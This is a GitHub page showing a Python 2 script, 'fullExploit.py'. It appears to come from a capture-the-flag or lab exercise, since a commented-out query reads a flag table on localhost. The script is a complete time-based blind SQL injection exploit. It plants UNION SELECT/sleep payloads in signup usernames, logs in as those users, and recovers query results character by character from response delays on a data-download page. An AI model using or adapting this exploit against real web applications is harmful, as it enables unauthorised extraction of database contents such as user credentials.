-
Notifications
You must be signed in to change notification settings - Fork 20
/
fullExploit.py
113 lines (81 loc) · 2.41 KB
/
fullExploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
import requests
import sys
import hashlib
import urllib
import os
import random
import string
import time
def randomString(stringLength=8):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
proxies = {'http':'127.0.0.1:8080', 'http':'127.0.0.1:8080'}
def register(ip,inj_str): # Getting registered
for j in range(32, 126):
target = "http://%s//signup.php" % (ip)
password = 'password'
username = '%s' % (inj_str.replace("[CHAR]", str(j)))
data = {
"username" : username,
"email" : randomString()+"@tester.com",
"password" : password,
"password1" : password,
"SignUp": "SignUp"
}
r = requests.post(target, data=data, allow_redirects=True)
res = r.text
return True
def login(ip, inj_str): # Logging in
for j in range(32, 126):
target = "http://%s/index.php" % (ip)
password = 'password'
username = '%s' % (inj_str.replace("[CHAR]", str(j)))
data = {
"username" : username,
"password" : password,
"login" : password
}
s = requests.Session()
r = s.post(target, data=data)
res = r.text
#status_code = r.status_code
if 'Followers' in res:
# open log files
target = "http://%s//user/settings.php?download=Download+Data" % (ip)
data = {
"download" : "Download Data",
}
response = s.get(target,timeout=20.00)
time = response.elapsed.total_seconds()
if(time > 10 ):
return j
return False
def inject(r, inj, ip):
extracted = ""
for k in range(1, r):
injection_string = "'/**/union/**/select/**/(case/**/when/**/(ascii(substring((%s),%s,1))=[CHAR])/**/then/**/sleep(10)/**/else/**/null/**/end),2,3,4,5,6,7,8,9/**/#" % (inj, k)
register(ip,injection_string)
retrieved_value = login(ip, injection_string)
if(retrieved_value):
extracted += chr(retrieved_value)
extracted_char = chr(retrieved_value)
sys.stdout.write(extracted_char)
sys.stdout.flush()
else:
print "\n(+) done!"
break
return extracted
def main():
if len(sys.argv) != 2:
print "(+) usage: %s " % sys.argv[0]
print '(+) eg: %s ' %sys.argv[0]
sys.exit(-1)
ip = "localhost"
query = sys.argv[1]
print "(+) Retrieving...."
#query = "select/**/your_flag/**/from/**/flag"
query = query.replace(" ", "/**/")
Flag = inject(40, query, ip)
print Flag
if __name__ == "__main__":
main()